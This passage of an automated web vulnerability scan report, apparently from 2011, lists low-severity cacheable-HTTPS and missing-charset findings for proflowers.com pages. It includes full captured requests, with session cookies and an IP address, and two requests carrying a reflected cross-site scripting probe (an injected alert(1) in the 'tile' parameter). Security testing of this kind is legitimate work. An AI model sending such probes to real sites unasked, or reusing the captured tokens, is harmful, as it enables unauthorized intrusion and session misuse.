The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

22.1. https://accounts.proflowers.com/CustomerLogin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /CustomerLogin.aspx

Request

GET /CustomerLogin.aspx?Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=tjb3lzavlroebrfrqg11rbq2; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:32 GMT
Content-Length: 60636

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
22.2. https://accounts.proflowers.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /Default.aspx

Request

GET /Default.aspx?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vkckynuy3ubxtgsnb1qqko4a; path=/; HttpOnly
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:13 GMT
Content-Length: 53696

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
22.3. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:09:31 GMT
Content-Length: 46815


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
22.4. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:21:25 GMT
Content-Length: 62175


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
22.5. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=PBS&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:05 GMT
Content-Length: 49219


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
22.6. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:52 GMT
Content-Length: 46799


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
22.7. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

Request

GET /orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx?aspxerrorpath=/OrderProcess/GiftOptions.aspx HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:21 GMT
Content-Length: 22986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <head id="Head1"><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcde
...[SNIP]...
22.8. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

Request

GET /orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx?aspxerrorpath=/OrderProcess/GiftOptions.aspx HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:13:17 GMT
Content-Length: 22986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <head id="Head1"><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcde
...[SNIP]...
23. HTML does not specify charset  previous  next
There are 7 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

23.1. http://a1128.g.akamai.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 209
Expires: Mon, 09 May 2011 12:09:47 GMT
Date: Mon, 09 May 2011 12:09:47 GMT
Connection: close

<HTML><HEAD>
<TITLE>Invalid URL</TITLE>
</HEAD><BODY>
<H1>Invalid URL</H1>
The requested URL "&#47;favicon&#46;ico", is invalid.<p>
Reference&#32;&#35;9&#46;45f754b8&#46;1304942987&#46;21ee440e
</BODY
...[SNIP]...
23.2. http://adsfac.us/pct_mx.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /pct_mx.asp

Request

GET /pct_mx.asp?L=305606&source=if HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
